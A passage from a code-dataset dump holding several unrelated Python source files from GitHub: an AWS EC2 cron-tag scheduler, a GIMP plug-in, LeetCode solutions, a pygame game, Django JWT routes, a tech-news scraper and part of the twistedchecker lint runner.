config.yml: \" + str(error))\n except:\n raise\n exit(\"Unexpected error:\" + str(sys.exc_info()[0]))\n\n def get_sleeper_instance_id(self):\n self.sleeper_instance_id = boto.utils.get_instance_metadata()['instance-id']\n\n def set_timezone(self):\n try:\n 
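The lottery scraper above walks day by day with `range(int((datetime.now() - dataInicial).days))`; the same traversal reads well as a small reusable generator, standard library only (the dates in the check are illustrative):

```python
from datetime import datetime, timedelta

def date_range(start, end=None):
    # Yields one datetime per day in [start, end), like the scraper's loop.
    end = end or datetime.now()
    for offset in range((end - start).days):
        yield start + timedelta(days=offset)

days = list(date_range(datetime(2018, 11, 1), datetime(2018, 11, 4)))
assert [d.day for d in days] == [1, 2, 3]
```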
os.environ[\"TZ\"]=self.config['general']['time_zone']\n time.tzset()\n self.time = time.time()\n except Exception as error:\n exit(\"Could not set time related stuff- very bad\")\n\n def ec2_connect(self):\n try:\n self.conn = boto.ec2.connect_to_region(self.config['general']['region'],profile_name=self.profile_name)\n except:\n #done again\n exit(\"Failed to connect to EC2\")\n\n def sns_connect(self):\n try:\n self.snsconn = boto.sns.connect_to_region(self.config['general']['region'],profile_name=self.profile_name)\n except (BaseException) as emsg:\n #done again\n logging.warning(self.timestamp + ': No SNS configured correctly - carry on - ' + str(emsg))\n #no sns configured or some issue\n pass\n\n def search_for_tagged(self):\n try:\n reservations = self.conn.get_all_instances(filters={'tag-key' : self.config['general']['filter']})\n for reserve in reservations:\n self.search_sleeper_tags(reserve.instances[0])\n except (BaseException) as emsg:\n logging.warning(self.timestamp + ': Cannot search for instances ' + str(emsg))\n sys.exit(\"Cannot search for instances/reservations\")\n\n def search_for_untagged_to_stop(self):\n try:\n reservations = self.conn.get_all_instances()\n for reserve in reservations:\n if self.config['general']['filter'] not in reserve.instances[0].__dict__['tags']:\n self.stop_instance(reserve.instances[0])\n except (BaseException) as emsg:\n logging.warning(self.timestamp + ': Untagged stop exception - not critical' + str(emsg))\n pass\n\n def search_sleeper_tags(self,instance):\n value = instance.__dict__['tags'][self.config['general']['filter']]\n if value == \"\":\n #we always trash instances that are not tagged correctly\n self.stop_instance(instance)\n return\n elif value == 'pass':\n #we take no specific action with this - by design\n return\n self.parse_cron(instance,value)\n\n def parse_cron(self,instance,value):\n try:\n crons = value.split('|')\n for i,v in enumerate(crons):\n if i == 0:\n self.cron_stop(instance,v)\n elif i == 1:\n self.cron_start(instance,v)\n except (BaseException) as emsg:\n logging.warning(self.timestamp + ': Could not parse tags - carry on ' + str(emsg))\n pass\n\n def cron_stop(self,instance,value):\n try:\n misspast = self.return_misspast(value)\n if misspast is False:\n return\n if (misspast < 0) and (misspast > -self.config['general']['threshold']):\n self.stop_instance(instance)\n except (BaseException) as emsg:\n logging.warning(self.timestamp + ': Cron Stop Failed on a value ' + str(emsg))\n pass\n\n def cron_start(self,instance,value):\n try:\n misspast = self.return_misspast(value)\n if misspast is False:\n return\n if (misspast < 0) and (misspast > -self.config['general']['threshold']):\n self.start_instance(instance)\n except (BaseException) as emsg:\n logging.warning(self.timestamp + ': Cron start failed on a value ' + str(emsg))\n pass\n\n def return_misspast(self,value):\n try:\n iter = croniter(value,self.time)\n point = iter.get_next(float)\n newpoint = iter.get_prev(float)\n misspast = newpoint - self.time\n return misspast\n except:\n return False\n\n def stop_instance(self, instance):\n if instance.id == self.sleeper_instance_id:\n # dont ever ever ever ever ever ever ever shut yourself down ever\n logging.warning(self.timestamp + ' Hmmm just tried to shut myself down - this is not cool')\n return\n if instance.state == \"running\":\n self.sns_stop.append(instance.id)\n instance.stop()\n\n def start_instance(self, instance):\n if instance.state == \"stopped\":\n self.sns_start.append(instance.id)\n 
instance.start()\n\n def sns_message(self):\n message = \"\"\n\n for item in self.sns_start:\n message += \"Started Instance:\" + item + \"\\n\"\n for item in self.sns_stop:\n message += \"Stopped Instance:\" + item + \"\\n\"\n\n if message != \"\":\n try:\n self.snsconn.publish(self.config['general']['sns_topic'], message, \"TheSleeper was invoked\")\n except:\n pass\n\n\nif __name__ == \"__main__\":\n ts = thesleeper()\n\n\n","repo_name":"monk-ee/TheSleeper","sub_path":"thesleeper.py","file_name":"thesleeper.py","file_ext":"py","file_size_in_byte":7056,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"8306946754","text":"#!/usr/bin/env python\n# GIMP Python plug-in for a \"quick\" image enhancement:\n\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License Version 3 as\n# published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License at http://www.gnu.org/licenses for\n# more details.\n\n# Cheap HDR + Unsharp maks + Contrast stretch\n# Quick AND idiosyncratic -- this is just my personal taste\n\nfrom gimpfu import *\nimport process\n\ndef quick_enhance(img,layer,r_hdr,s_hdr,f_hdr,r_sharp,s_l_mode,f_stretch):\n '''combines cheap-hdr, sharpen, and stretch'''\n with process.UndoContext(img):\n process.cheap_hdr(img,layer,r_hdr,s_hdr,f_hdr)\n process.sharpen(img,layer,r_sharp,s_l_mode)\n if f_stretch:\n process.stretch(img,layer,f_stretch)\n else:\n process.visible_base(img,name=\"QuickEnhanced\")\n\n\nprocess.pfreg(quick_enhance,\n [\n (PF_IMAGE, \"image\", \"Input image\", None),\n (PF_DRAWABLE, \"drawable\", \"Input drawable\", None),\n (PF_SLIDER, \"r_hdr\", \"HDR Radius\", 750, (0, 1500, 1)),\n (PF_SLIDER, \"s_hdr\", \"HDR Spread\", 50, (0, 250, 10)),\n (PF_SLIDER, \"f_hdr\", \"HDR factor\", 50, (0, 100, 1)),\n (PF_SLIDER, \"r_sharp\", \"Unsharp Radius\", 9, (0, 25, 1)),\n (PF_RADIO, \"s_l_mode\",\"Sharpen Layer Mode\",\n LAYER_MODE_DARKEN_ONLY,\n ((\"darken\", LAYER_MODE_DARKEN_ONLY),\n (\"lighten\", LAYER_MODE_LIGHTEN_ONLY),\n (\"normal\", LAYER_MODE_NORMAL))),\n (PF_SLIDER, \"f_stretch\",\"Stretch factor\",50, (0,100,1)),\n ],\n name=\"Quick Enhance\",\n description=\"Cheap HDR, then sharpen, then stretch\",\n author=\"theilr\",\n year=2022,\n menu=\"/Filters/theilr\"\n)\n\nmain()\n","repo_name":"theilr/gimp-frastructure","sub_path":"quickenhance.py","file_name":"quickenhance.py","file_ext":"py","file_size_in_byte":2142,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"16560598388","text":"#!/usr/bin/env python\n# -*- coding:utf8 -*-\n\"\"\"\n @author:huang xiaoqin\n @time: 2020/8/4\n @desc:\n\"\"\"\n\nclass Solution(object):\n def backspaceCompare(self, S, T):\n \"\"\"\n :type S: str\n :type T: str\n :rtype: bool\n \"\"\"\n S_stack = []\n T_stack = []\n for ch in S:\n if ch == '#':\n if len(S_stack)>0:\n S_stack.pop()\n else:\n S_stack.append(ch)\n for ch in T:\n if ch == '#' :\n if len(T_stack)>0:\n T_stack.pop()\n else:\n T_stack.append(ch)\n print(S_stack,T_stack)\n while len(S_stack) != 0 and len(T_stack) != 0:\n if S_stack.pop() != T_stack.pop():\n return False\n if len(S_stack)>0 or len(T_stack)>0:\n return False\n return 
True\n","repo_name":"294150302hxq/python_learn","sub_path":"leetcode/844_backspace_string_compare.py","file_name":"844_backspace_string_compare.py","file_ext":"py","file_size_in_byte":892,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"2553192771","text":"import pygame\nimport json\nimport time\nimport random\nfrom enemy import *\nfrom character import *\nfrom text import *\nfrom screen import *\nfrom color import *\n\nwinw = 800\nwinh = 600\n\nclass Game:\n\tdef __init__(self):\n\t\tpygame.init()\n\t\tself.clock = pygame.time.Clock()\n\t\tself.gamedisplay = pygame.display.set_mode((winw, winh))\n\t\tpygame.display.set_caption(\"Hopper\")\n\n\t\twith open('level.json') as file:\n\t\t\tself.data = json.load(file)\n\n\t\tself.fps \t = 60\n\t\tself.crashed = False\n\n\t\tself.keynone = tuple([0] * 323)\n\n\t\tself.t_empty = Text(self.gamedisplay, '')\n\t\tself.t_title = Text(self.gamedisplay, \"Hopper\", green, 100)\n\t\tself.t_over = Text(self.gamedisplay, 'Game Over', red, 80)\n\n\t\tself.t_play = Text(self.gamedisplay, 'C to play', yoffset=60)\n\t\tself.t_quit = Text(self.gamedisplay, 'Q to quit', yoffset=80)\n\t\tself.t_back = Text(self.gamedisplay, 'B to go back to the main menu', yoffset=100)\n\n\t\tself.s_main = Screen(self.gamedisplay, self.t_title, c=self.t_play, q=self.t_quit)\n\n\t\tself.player\t = Character(winw/2, winh/2)\n\t\tself.allsprites = pygame.sprite.Group()\n\n\tdef curve(self, currentlevel):\n\t\treturn (currentlevel**1.2) * 30\n\n\tdef quitgame(self):\n\t\tpygame.quit()\n\t\tquit()\n\n\tdef xbutton(self):\n\t\tfor event in pygame.event.get():\n\t\t\tif event.type == pygame.QUIT:\n\t\t\t\tself.quitgame()\n\n\tdef run(self):\n\t\toutput = self.s_main.loop()\n\t\twhile True:\n\t\t\tself.level \t = 1\n\t\t\tself.tick\t = 0\n\t\t\tself.points = 0\n\t\t\tself.player.reset(winw/2, winh/2)\n\n\t\t\tself.allsprites = pygame.sprite.Group()\n\t\t\tself.allsprites.add(self.player)\n\n\t\t\tEnemy.reset(self.data[0])\n\t\t\n\t\t\tif output == pygame.K_q:\n\t\t\t\tself.quitgame()\n\n\t\t\texitcode = self.gameloop()\n\n\t\t\tif exitcode == 'quit':\n\t\t\t\tself.quitgame()\n\t\t\telif exitcode == 'dead':\n\t\t\t\toutput = self.gameover()\n\t\n\tdef gameover(self):\n\t\ts_gameover = Screen(self.gamedisplay, self.t_over, Text(self.gamedisplay, 'Level: ' + str(self.level), yoffset=20, ycenter=False), Text(self.gamedisplay, 'Score: ' + str(self.points), yoffset=40, ycenter=False),c=self.t_play, q=self.t_quit, b=self.t_back)\n\t\treturn s_gameover.loop()\n\n\tdef levelmanager(self):\n\t\tif self.points > self.curve(self.level):\n\t\t\tself.level += 1\n\t\t\tif len(self.data) >= self.level:\n\t\t\t\tEnemy.difficulty(self.data[self.level - 1])\n\t\t\t# later: Include infinite difficulty curve\n\n\tdef waitforrelease(self):\n\t\tpygame.event.pump()\n\t\tkey = pygame.key.get_pressed()\n\t\twhile not key == self.keynone:\n\t\t\tpygame.event.pump()\n\t\t\tkey = pygame.key.get_pressed()\n\t\t\tself.clock.tick(self.fps)\n\n\tdef gameloop(self):\n\t\twhile not self.crashed:\n\t\t\tself.xbutton()\n\n\t\t\t# Key Listeners\n\t\t\tkey = pygame.key.get_pressed()\n\t\t\tif key[pygame.K_q]:\n\t\t\t\tself.waitforrelease()\n\t\t\t\treturn 'quit'\n\t\t\telif key[pygame.K_p]:\n\t\t\t\tText(self.gamedisplay, '~ Paused ~', white, 60).displaytext()\n\t\t\t\tpygame.display.flip()\n\t\t\t\tself.waitforrelease()\n\t\t\t\tkey = pygame.key.get_pressed()\n\t\t\t\twhile not(key[pygame.K_p]):\n\t\t\t\t\tself.xbutton()\n\t\t\t\t\tkey = 
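The stack-based `backspaceCompare` above costs O(n) extra space; scanning both strings from the right gives the same answer in O(1) space, since a `#` simply tells you to skip the next surviving character. A self-contained sketch with the LeetCode examples as checks:

```python
from itertools import zip_longest

def backspace_compare(s, t):
    def survivors(string):
        # Walk right-to-left, banking backspaces and spending them
        # on the characters they delete.
        skip = 0
        for ch in reversed(string):
            if ch == '#':
                skip += 1
            elif skip:
                skip -= 1
            else:
                yield ch

    # zip_longest pads the shorter stream with None, so unequal
    # lengths compare unequal.
    return all(a == b for a, b in zip_longest(survivors(s), survivors(t)))

assert backspace_compare("ab#c", "ad#c") is True
assert backspace_compare("ab##", "c#d#") is True
assert backspace_compare("a#c", "b") is False
```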
pygame.key.get_pressed()\n\t\t\t\tself.waitforrelease()\n\t\t\telse:\n\t\t\t\tself.player.update(key)\n\t\t\t\tEnemy.enemylist.update()\n\n\t\t\t# Collision Detection \n\t\t\tcollisions = pygame.sprite.spritecollide(self.player, Enemy.enemylist, True)\n\t\t\tif collisions:\n\t\t\t\treturn 'dead'\n\n\t\t\t# Enemy Spawning\n\t\t\tif self.tick > Enemy.spawnrate:\n\t\t\t\tself.tick = 0\n\t\t\t\tenemy = Enemy() # new enemy\n\t\t\t\tEnemy.enemylist.add(enemy)\n\t\t\t\tself.allsprites.add(enemy)\n\n\t\t\tself.tick += 1\n\n\t\t\tif self.tick % 10 == 0:\n\t\t\t\tself.points += 1\n\n\t\t\tself.levelmanager()\n\n\t\t\t# Display Clear\n\t\t\tself.gamedisplay.fill(black)\n\n\t\t\t# Draw all sprites\n\t\t\tself.allsprites.draw(self.gamedisplay)\n\n\t\t\t# Display Enemies\n\t\t\t#for e in Enemy.enemylist:\n\t\t\t#\tpygame.draw.rect(self.gamedisplay, e.color, e.display())\n\t\t\t#\tif e.iscolliding(self.player):\n\t\t\t#\t\treturn 'dead'\n\n\t\t\t# Display Floor\n\t\t\t#pygame.draw.rect(self.gamedisplay, white, [0, winh-95, winw, 4])\n\n\t\t\t# Display Text (last two temp)\n\t\t\tText(self.gamedisplay, 'Level: ' + str(self.level), white, ycenter=False, yoffset=20).displaytext()\n\t\t\tText(self.gamedisplay, 'Score: ' + str(self.points), white, ycenter=False, yoffset=40).displaytext()\n\t\t\tText(self.gamedisplay, 'Spawn Rate: ' + str(Enemy.spawnrate), white, ycenter=False, yoffset=60).displaytext()\n\t\t\tText(self.gamedisplay, 'Direction: ' + str(Enemy.direction), white, ycenter=False, yoffset=80).displaytext()\n\n\t\t\t# Update and tick @ 60fps\n\t\t\tpygame.display.flip()\n\t\t\tself.clock.tick(self.fps)\n","repo_name":"RitikShah/hopper","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":4374,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"27797632274","text":"from django.urls import path\nfrom rest_framework_jwt import views as jwt_views\n\nfrom. 
import views\n\nurlpatterns = [\n    path('api/token/', jwt_views.obtain_jwt_token, name='token_obtain_pair'),\n    path('api/token/refresh/', jwt_views.refresh_jwt_token, name='token_refresh'),\n    path('api/token/verify/', jwt_views.verify_jwt_token, name='token_verify'),\n    path('all/', views.UserList.as_view()),\n    path('user/', views.OwnUserRUD.as_view()),\n    path('register/', views.CreateUser.as_view()),\n    path('check-username/', views.CheckUsername.as_view()),\n    path('check-email/', views.CheckEmail.as_view()),\n    path('add-favourite/', views.AddFavourite.as_view()),\n    path('favourites/', views.Favourites.as_view()),\n]\n","repo_name":"Arihtev/DiplomaBE","sub_path":"users/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":731,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"16278796596","text":"# -*- coding: utf-8 -*-\n\"\"\"\n-------------------------------------------------\n   File: techweb.py\n   Desc: TechWeb(http://www.techweb.com.cn/)\n   Author: CoderPig\n   Date: 2019/3/27 0027 20:41\n-------------------------------------------------\n\"\"\"\nfrom news import News, MongodbClient\nfrom tools import user_agents, str_handle\nimport requests as r\nfrom pyquery import PyQuery\n\nindex_url = 'http://www.techweb.com.cn/'\nroll_url = index_url + 'roll/'\nheaders = {\n    'User-Agent': user_agents.random_user_agent(),\n    'Host': str_handle.remove_url_scheme(index_url)[:-1],\n    'Referer': roll_url,\n}\n\n\ndef fetch_news():\n    news_list = []\n    resp = r.get(roll_url, headers=headers)\n    print(\"Crawling: %s\" % resp.url)\n    if resp is not None:\n        resp.encoding = 'utf8'\n        pq = PyQuery(resp.text)\n        lis = pq('div.newslist > ul >li')\n        for li in lis.items():\n            if li.attr('class') != 'line':\n                a = li('span.tit > a')\n                news_list.append(News(\n                    _id=a.attr('href').split('/')[-1].replace('.shtml', ''),\n                    url=a.attr('href'),\n                    title=a.text(),\n                    origin=li('span.column').text() + '|' + li('span.source').text(),\n                    update_time=li('span.time').text()\n                ).to_dict())\n    return news_list\n\n\nif __name__ == '__main__':\n    client = MongodbClient('techweb')\n    client.insert_many(fetch_news())\n    print(\"techweb crawl finished!\")\n","repo_name":"coder-pig/CPInfoSource-Spider","sub_path":"news/internet/techweb.py","file_name":"techweb.py","file_ext":"py","file_size_in_byte":1479,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"34"} +{"seq_id":"15739828277","text":"#\n# @lc app=leetcode.cn id=23 lang=python\n#\n# [23] Merge K Sorted Lists\n#\n\n# @lc code=start\n# Definition for singly-linked list.\n# class ListNode(object):\n#     def __init__(self, val=0, next=None):\n#         self.val = val\n#         self.next = next\nclass Solution(object):\n    def mergeKLists(self, lists):\n        \"\"\"\n        :type lists: List[ListNode]\n        :rtype: ListNode\n        \"\"\"\n        def mergeTwoList(list1, list2):\n            dummy = ListNode(0)\n            res = dummy\n            while list1 is not None and list2 is not None:\n                if list1.val < list2.val:\n                    dummy.next = list1\n                    list1 = list1.next\n                else:\n                    dummy.next = list2\n                    list2 = list2.next\n                dummy = dummy.next\n            if list1 is not None:\n                dummy.next = list1\n            elif list2 is not None:\n                dummy.next = list2\n            return res.next\n\n        if len(lists) == 0:\n            return None\n\n        if len(lists) == 1:\n            return lists[0]\n\n        i = 0\n        tmp = []\n        for i in range(0, len(lists) - 1, 2):\n            tmp.append(mergeTwoList(lists[i], lists[i + 1]))\n        # handle the leftover list when the count is odd\n        if i + 2 != len(lists):\n            tmp.append(lists[-1])\n        return self.mergeKLists(tmp)\n# @lc 
code=end\n\n","repo_name":"GardianT/leetcode-training","sub_path":"23.合并k个升序链表.py","file_name":"23.合并k个升序链表.py","file_ext":"py","file_size_in_byte":1389,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"233328352","text":"import sys\nimport os\nimport re\n\nfrom astroid.modutils import file_from_modpath\nfrom pylint.checkers.base import NameChecker\nfrom pylint.lint import PyLinter\n\nfrom twisted.python.compat import NativeStringIO\n\nimport twistedchecker\nfrom twistedchecker.checkers import patch_pylint_format\nfrom twistedchecker.core.exceptionfinder import findAllExceptions\nfrom twistedchecker.reporters.limited import LimitedReporter\n\n\nclass Runner():\n \"\"\"\n Run and control the checking process.\n \"\"\"\n outputStream = None\n linter = None\n allowOptions = None\n # Customized checkers.\n checkers = (\"header.HeaderChecker\",\n \"names.TwistedNamesChecker\",\n \"docstring.DocstringChecker\",\n \"formattingoperation.FormattingOperationChecker\",\n \"comment.CommentChecker\",\n \"testclassname.TestClassNameChecker\")\n allowedMessagesFromPylint = (\"F0001\",\n \"C0103\",\n \"C0301\",\n \"W0311\",\n \"W0312\")\n diffOption = None\n errorResultRead = \"Error: Failed to read result file '%s'.\\n\"\n prefixModuleName = \"************* Module \"\n regexLineStart = \"^[WCEFR]\\d{4}\\:\"\n\n def __init__(self):\n \"\"\"\n Initialize C{PyLinter} object, and load configuration file.\n \"\"\"\n self.allowOptions = True\n self.linter = PyLinter(self._makeOptions())\n # register standard checkers.\n self.linter.load_default_plugins()\n # read configuration.\n pathConfig = os.path.join(twistedchecker.abspath,\n \"configuration\", \"pylintrc\")\n self.linter.read_config_file(pathConfig)\n # now we can load file config and command line, plugins (which can\n # provide options) have been registered.\n self.linter.load_config_file()\n allowedMessages = self.registerCheckers()\n # disable messages\n disabledMessages = set(self.linter\n .cfgfile_parser.get(\"TWISTEDCHECKER\", \"disable\")\n .replace(\" \", \"\").split(\",\"))\n if disabledMessages != {\"\"}:\n for msg in disabledMessages:\n self.linter.disable(msg)\n allowedMessages -= disabledMessages\n # set default output stream to stdout\n self.setOutput(sys.stdout)\n # set default reporter to limited reporter\n self.linter.set_reporter(LimitedReporter(allowedMessages))\n\n\n def _makeOptions(self):\n \"\"\"\n Return options for twistedchecker.\n \"\"\"\n return (\n (\"diff\",\n {\"type\": \"string\",\n \"metavar\": \"\",\n \"help\": \"Set comparing result file to automatically \"\n \"generate a diff.\"}\n ),\n ('pep8',\n {'type': 'yn', 'metavar': '',\n 'default': False,\n 'help': 'Show pep8 warnings.'}\n ),\n ('strict-epydoc',\n {'type': 'yn', 'metavar': '',\n 'default': False,\n 'help': \"Check '@type' and '@rtype' in epydoc.\"}\n ),\n )\n\n\n def setOutput(self, stream):\n \"\"\"\n Set the stream to output result of checking.\n\n @param stream: output stream, defaultly it should be stdout\n \"\"\"\n self.outputStream = stream\n sys.stdout = stream\n\n\n def displayHelp(self):\n \"\"\"\n Output help message of twistedchecker.\n \"\"\"\n self.outputStream.write(self.linter.help())\n sys.exit(32)\n\n\n def registerCheckers(self):\n \"\"\"\n Register all checkers of TwistedChecker to C{PyLinter}.\n\n @return: a list of allowed messages\n \"\"\"\n # We patch the default pylint format checker.\n patch_pylint_format.patch()\n\n # register checkers\n allowedMessages = 
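The recursive pairwise merge in the record above runs in O(N log k); an explicit min-heap reaches the same bound iteratively. A self-contained sketch with a local `ListNode`, since the LeetCode harness normally supplies one (the index in each heap tuple breaks ties so nodes themselves are never compared):

```python
import heapq

class ListNode(object):
    def __init__(self, val=0, next=None):
        self.val = val
        self.next = next

def merge_k_lists(lists):
    heap = [(node.val, i, node) for i, node in enumerate(lists) if node]
    heapq.heapify(heap)
    dummy = tail = ListNode(0)
    while heap:
        val, i, node = heapq.heappop(heap)
        tail.next = tail = node          # append and advance in one step
        if node.next:
            heapq.heappush(heap, (node.next.val, i, node.next))
    return dummy.next

def from_list(xs):
    head = None
    for x in reversed(xs):
        head = ListNode(x, head)
    return head

merged = merge_k_lists([from_list([1, 4, 5]), from_list([1, 3, 4]), from_list([2, 6])])
out = []
while merged:
    out.append(merged.val)
    merged = merged.next
assert out == [1, 1, 2, 3, 4, 4, 5, 6]
```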
list(self.allowedMessagesFromPylint)\n for strChecker in self.checkers:\n modname, classname = strChecker.split(\".\")\n strModule = \"twistedchecker.checkers.%s\" % modname\n checker = getattr(__import__(strModule,\n fromlist=[\"twistedchecker.checkers\"]),\n classname)\n instanceChecker = checker(self.linter)\n allowedMessages += list(instanceChecker.msgs.keys())\n self.linter.register_checker(instanceChecker)\n\n self.restrictCheckers(allowedMessages)\n return set(allowedMessages)\n\n\n def unregisterChecker(self, checker):\n \"\"\"\n Remove a checker from the list of registered checkers.\n\n @param checker: the checker to remove\n \"\"\"\n self.linter._checkers[checker.name].remove(checker)\n if checker in self.linter._reports:\n del self.linter._reports[checker]\n if checker in self.linter.options_providers:\n self.linter.options_providers.remove(checker)\n\n\n def findUselessCheckers(self, allowedMessages):\n \"\"\"\n Find checkers which generate no allowed messages.\n\n @param allowedMessages: allowed messages\n @return: useless checkers, remove them from pylint\n \"\"\"\n uselessCheckers = []\n for checkerName in self.linter._checkers:\n for checker in list(self.linter._checkers[checkerName]):\n messagesOfChecker = set(checker.msgs)\n if not messagesOfChecker.intersection(allowedMessages):\n uselessCheckers.append(checker)\n return uselessCheckers\n\n\n def restrictCheckers(self, allowedMessages):\n \"\"\"\n Unregister useless checkers to speed up twistedchecker.\n\n @param allowedMessages: output messages allowed in twistedchecker\n \"\"\"\n uselessCheckers = self.findUselessCheckers(allowedMessages)\n # Unregister these checkers\n for checker in uselessCheckers:\n self.unregisterChecker(checker)\n\n\n def getCheckerByName(self, checkerType):\n \"\"\"\n Get checker by given name.\n\n @checkerType: type of the checker\n \"\"\"\n for checker in sum(list(self.linter._checkers.values()), []):\n if isinstance(checker, checkerType):\n return checker\n return None\n\n\n def allowPatternsForNameChecking(self, patternsFunc, patternsClass):\n \"\"\"\n Allow name exceptions by given patterns.\n\n @param patternsFunc: patterns of special function names\n @param patternsClass: patterns of special class names\n \"\"\"\n cfgParser = self.linter.cfgfile_parser\n nameChecker = self.getCheckerByName(NameChecker)\n if not nameChecker:\n return\n if patternsFunc:\n regexFuncAdd = \"|((%s).+)$\" % \"|\".join(patternsFunc)\n else:\n regexFuncAdd = \"\"\n if patternsClass:\n regexClassAdd = \"|((%s).+)$\" % \"|\".join(patternsClass)\n else:\n regexClassAdd = \"\"\n # Modify regex for function, method and class name.\n regexMethod = cfgParser.get(\"BASIC\", \"method-rgx\") + regexFuncAdd\n regexFunction = cfgParser.get(\"BASIC\", \"function-rgx\") + regexFuncAdd\n regexClass = cfgParser.get(\"BASIC\", \"class-rgx\") + regexClassAdd\n # Save to config parser.\n cfgParser.set(\"BASIC\", \"method-rgx\", regexMethod)\n cfgParser.set(\"BASIC\", \"function-rgx\", regexFunction)\n cfgParser.set(\"BASIC\", \"class-rgx\", regexClass)\n # Save to name checker.\n nameChecker.config.method_rgx = re.compile(regexMethod)\n nameChecker.config.function_rgx = re.compile(regexFunction)\n nameChecker.config.class_rgx = re.compile(regexClass)\n\n\n def getPathList(self, filesOrModules):\n \"\"\"\n Transform a list of modules to path.\n\n @param filesOrModules: a list of modules (may be foo/bar.py or\n foo.bar)\n \"\"\"\n pathList = []\n for fileOrMod in filesOrModules:\n if not os.path.exists(fileOrMod):\n # May be given 
module is not not a path,\n # then transform it to a path.\n try:\n filepath = file_from_modpath(fileOrMod.split('.'))\n except (ImportError, SyntaxError):\n # Could not load this module.\n continue\n if not os.path.exists(filepath):\n # Could not find this module in file system.\n continue\n if os.path.basename(filepath) == \"__init__.py\":\n filepath = os.path.dirname(filepath)\n else:\n filepath = fileOrMod\n pathList.append(filepath)\n return pathList\n\n\n def setNameExceptions(self, filesOrModules):\n \"\"\"\n Find name exceptions in codes and allow them to be ignored\n in checking.\n\n @param filesOrModules: a list of modules (may be foo/bar.py or\n foo.bar)\n \"\"\"\n pathList = self.getPathList(filesOrModules)\n for path in pathList:\n patternsFunc, patternsClass = findAllExceptions(path)\n self.allowPatternsForNameChecking(patternsFunc, patternsClass)\n\n\n def run(self, args):\n \"\"\"\n Setup the environment, and run pylint.\n\n @param args: arguments will be passed to pylint\n @type args: list of string\n \"\"\"\n # set output stream.\n if self.outputStream:\n self.linter.reporter.set_output(self.outputStream)\n try:\n args = self.linter.load_command_line_configuration(args)\n except SystemExit as exc:\n if exc.code == 2: # bad options\n exc.code = 32\n raise\n if not args:\n self.displayHelp()\n # Check for 'strict-epydoc' option.\n if self.allowOptions and not self.linter.option_value(\"strict-epydoc\"):\n for msg in [\"W9203\", \"W9205\"]:\n self.linter.disable(msg)\n\n # insert current working directory to the python path to have a correct\n # behaviour.\n sys.path.insert(0, os.getcwd())\n # set exceptions for name checking.\n self.setNameExceptions(args)\n\n # check for diff option.\n self.diffOption = self.linter.option_value(\"diff\")\n if self.diffOption:\n self.prepareDiff()\n\n # check codes.\n self.linter.check(args)\n\n # show diff of warnings if diff option on.\n if self.diffOption:\n diffCount = self.showDiffResults()\n exitCode = 1 if diffCount else 0\n sys.exit(exitCode)\n\n sys.exit(self.linter.msg_status)\n\n\n def prepareDiff(self):\n \"\"\"\n Prepare to run the checker and get diff results.\n \"\"\"\n self.streamForDiff = NativeStringIO()\n self.linter.reporter.set_output(self.streamForDiff)\n\n\n def showDiffResults(self):\n \"\"\"\n Show results when diff option on.\n \"\"\"\n try:\n oldWarnings = self.parseWarnings(self._readDiffFile())\n except:\n sys.stderr.write(self.errorResultRead % self.diffOption)\n return 1\n\n newWarnings = self.parseWarnings(self.streamForDiff.getvalue())\n\n diffWarnings = self.generateDiff(oldWarnings, newWarnings)\n\n if diffWarnings:\n diffResult = self.formatWarnings(diffWarnings)\n self.outputStream.write(diffResult + \"\\n\")\n return len(diffWarnings)\n else:\n return 0\n\n def _readDiffFile(self):\n \"\"\"\n Read content of diff file.\n\n This is here to help with testing.\n\n @return: File content.\n @rtype: c{str}\n \"\"\"\n with open(self.diffOption) as f:\n content = f.read()\n return content\n\n def generateDiff(self, oldWarnings, newWarnings):\n \"\"\"\n Generate diff between given two lists of warnings.\n\n @param oldWarnings: parsed old warnings\n @param newWarnings: parsed new warnings\n @return: a dict object of diff\n \"\"\"\n diffWarnings = {}\n\n for modulename in newWarnings:\n diffInModule = (\n newWarnings[modulename] -\n oldWarnings.get(modulename, set()))\n if diffInModule:\n diffWarnings[modulename] = diffInModule\n\n return diffWarnings\n\n\n def parseWarnings(self, result):\n \"\"\"\n Transform 
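`generateDiff` in the runner above keeps, per module, only the warnings that were absent from the previous run. A dependency-free illustration of that set arithmetic; the module and message strings here are made up:

```python
def generate_diff(old_warnings, new_warnings):
    # {module: set(warnings)} in, {module: set(new-only warnings)} out;
    # modules with nothing new are dropped entirely.
    diff = {}
    for module, new in new_warnings.items():
        added = new - old_warnings.get(module, set())
        if added:
            diff[module] = added
    return diff

old = {"pkg.mod": {"W9001:1: foo", "C0103:4: bar"}}
new = {"pkg.mod": {"W9001:1: foo", "W9208:9: baz"},
       "pkg.other": {"W9011:2: qux"}}
assert generate_diff(old, new) == {
    "pkg.mod": {"W9208:9: baz"},
    "pkg.other": {"W9011:2: qux"},
}
```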
